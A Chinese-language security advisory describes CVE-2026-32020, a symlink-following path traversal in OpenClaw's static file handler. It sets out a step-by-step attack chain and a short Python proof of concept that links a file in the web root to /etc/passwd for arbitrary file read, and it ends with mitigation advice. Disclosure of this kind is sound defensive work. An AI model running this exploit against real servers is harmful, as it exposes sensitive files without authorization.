CVE-2026-32020 CVSS 3.3 低危

CVE-2026-32020 OpenClaw路径遍历漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32020

漏洞类型

路径遍历

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.2.22之前的版本中存在路径遍历漏洞。由于静态文件处理程序未能正确处理符号链接，攻击者可以利用低权限在Control UI根目录下创建符号链接。这使得攻击者能够绕过目录限制检查，从而读取Web根目录之外的任意文件，造成敏感信息泄露。

技术细节

该漏洞的核心在于OpenClaw静态文件处理程序对符号链接的校验逻辑存在缺陷。在受影响版本中，系统仅检查了请求路径是否位于预设的Web根目录内，但在文件读取操作时直接跟随了符号链接，未对最终解析的目标路径进行二次校验。攻击者首先需要具备本地低权限，能够向Control UI根目录写入文件。接着，攻击者在该目录下创建指向系统敏感文件（如/etc/passwd）的符号链接。最后，攻击者通过浏览器或HTTP客户端访问该符号链接，服务器在处理请求时跟随链接读取并返回了原受保护文件的内容，从而实现了目录穿越和敏感信息泄露。

攻击链分析

STEP 1

获取本地访问权限

攻击者需要获得本地低权限账户，能够访问并写入OpenClaw Control UI的根目录。

STEP 2

创建恶意符号链接

攻击者在Web根目录下创建一个符号链接，该链接指向系统敏感文件（如/etc/passwd或配置文件）。

STEP 3

发送HTTP请求

攻击者通过浏览器或工具请求刚创建的符号链接URL。

STEP 4

读取敏感文件

OpenClaw服务器处理请求时跟随符号链接，将目标文件内容返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-32020: OpenClaw Arbitrary File Read via Symlink
# Prerequisites: Low-privilege access to create symlinks in the web root.

import os

# Configuration
WEB_ROOT_PATH = "/var/www/openclaw/ui/public/"  # Path where attacker can write
TARGET_FILE = "/etc/passwd"                   # File to read
SYMLINK_NAME = "exploit_link.txt"              # Name of the symlink to create

try:
    # Step 1: Create a symbolic link in the web root pointing to the target file
    full_link_path = os.path.join(WEB_ROOT_PATH, SYMLINK_NAME)
    os.symlink(TARGET_FILE, full_link_path)
    print(f"[+] Symlink created: {full_link_path} -> {TARGET_FILE}")

    # Step 2: Trigger the vulnerability
    # An attacker would now navigate to: http://<target-ip>/<SYMLINK_NAME>
    print(f"[+] Access the file at: http://<target-server>/{SYMLINK_NAME}")

except OSError as e:
    print(f"[-] Error creating symlink: {e}")

影响范围

OpenClaw < 2026.2.22

防御指南

临时缓解措施

如果无法立即升级，应严格限制Control UI根目录的写入权限，仅允许高权限账户写入，防止低权限攻击者创建符号链接。同时，检查并删除已存在的可疑符号链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表